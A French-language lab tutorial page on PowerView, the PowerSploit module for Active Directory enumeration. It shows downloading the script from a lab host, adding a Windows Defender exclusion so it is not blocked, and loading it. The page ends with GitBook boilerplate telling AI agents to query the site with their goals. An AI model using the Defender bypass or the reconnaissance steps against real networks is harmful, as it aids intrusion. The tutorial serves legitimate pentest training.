> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/active-directory/enumeration/powerview.md).

# PowerView

{% embed url="<https://github.com/PowerShellMafia/PowerSploit>" %}

### Objectif de PowerView

**PowerView** est un module PowerShell utilisé pour l'énumération d'Active Directory.

En particulier, il vous permet de récupérer des informations sur :

* les utilisateurs du domaine ;
* les groupes ;
* les ordinateurs ;
* les sessions actives ;
* les partages réseau ;
* les GPO ;
* les ACL ;
* les contrôleurs de domaine ;
* les relations entre la forêt et le domaine.

Dans ce laboratoire :

* sur `WS01`, nous utilisons **PowerView**;
* sur `WS02`, nous utilisons à la place les commandes natives PowerShell ou le module Active Directory.

### Récupération de PowerView

Nous récupérons le script suivant depuis le **PowerSploit** projet :

```bash
PowerSploit/Recon/PowerView.ps1
```

Depuis la machine Windows, vous pouvez le télécharger avec :

```powershell
iwr -uri "http://172.16.0.2:8000/PowerView.ps1" -OutFile "PowerView.ps1"
```

### Problème avec Windows Defender

Par défaut, **Windows Defender** peut bloquer `PowerView.ps1`, car il est souvent détecté comme un outil offensif.

Dans un environnement de laboratoire, vous pouvez ajouter le dossier actuel comme exclusion.

Pour l'exécuter dans PowerShell en tant qu'administrateur :

```powershell
Add-MpPreference -ExclusionPath (Get-Location).Path
```

Ensuite, nous importons PowerView :

```powershell
. ./PowerView.ps1
```

Le point suivi d'un espace charge les fonctions du script dans la session PowerShell actuelle.

<figure><img src="/files/b2e409848ea8cddb12746f0be0f3eee5723e3d45" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/active-directory/enumeration/powerview.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
